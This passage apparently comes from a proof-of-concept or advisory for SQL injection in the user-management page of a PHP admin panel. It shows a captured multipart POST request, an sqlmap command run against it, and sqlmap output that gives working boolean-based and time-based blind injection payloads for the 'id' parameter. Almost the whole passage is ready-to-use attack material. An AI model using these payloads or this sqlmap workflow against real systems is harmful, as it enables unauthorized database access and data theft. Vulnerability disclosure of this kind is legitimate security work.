"Not_A Brand";v="8", "Chromium";v="120"<br />Accept: */*<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAUtgvsSwiJifz27g<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36<br />sec-ch-ua-platform: "macOS"<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/php-acrss/admin/?page=user/manage_user&id=9<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Cookie: PHPSESSID=o92n8nati3696kg69plidv5e77<br />Connection: close<br /><br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="id"<br /><br />9<br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="firstname"<br /><br />Claire<br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="middlename"<br /><br /><br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="lastname"<br /><br />Blake<br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="username"<br /><br />cblake<br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="password"<br /><br /><br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="type"<br /><br />2<br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundaryAUtgvsSwiJifz27g--<br /><br />-> sqlmap -r ~/Documents/POST-localhost.txt --batch<br /><br />---<br />Parameter: MULTIPART id ((custom) POST)<br /> Type: boolean-based blind<br /> Title: Boolean-based blind - Parameter replace (original value)<br /> Payload: ------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="id"<br /><br />(SELECT (CASE WHEN (3947=3947) THEN 9 ELSE (SELECT 2252 UNION SELECT 2638) END))<br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="firstname"<br /><br />Claire<br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="middlename"<br /><br /><br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="lastname"<br /><br />Blake<br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="username"<br /><br />cblake<br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="password"<br /><br /><br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="type"<br /><br />2<br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundaryAUtgvsSwiJifz27g--<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: ------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="id"<br /><br />9 AND (SELECT 7168 FROM (SELECT(SLEEP(5)))pifO)<br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="firstname"<br /><br />Claire<br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="middlename"<br /><br /><br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="lastname"<br /><br />Blake<br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="username"<br /><br />cblake<br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="password"<br /><br /><br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="type"<br /><br />2<br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundaryAUtgvsSwiJifz27g--<br />---<br /><br /><br /></code></pre>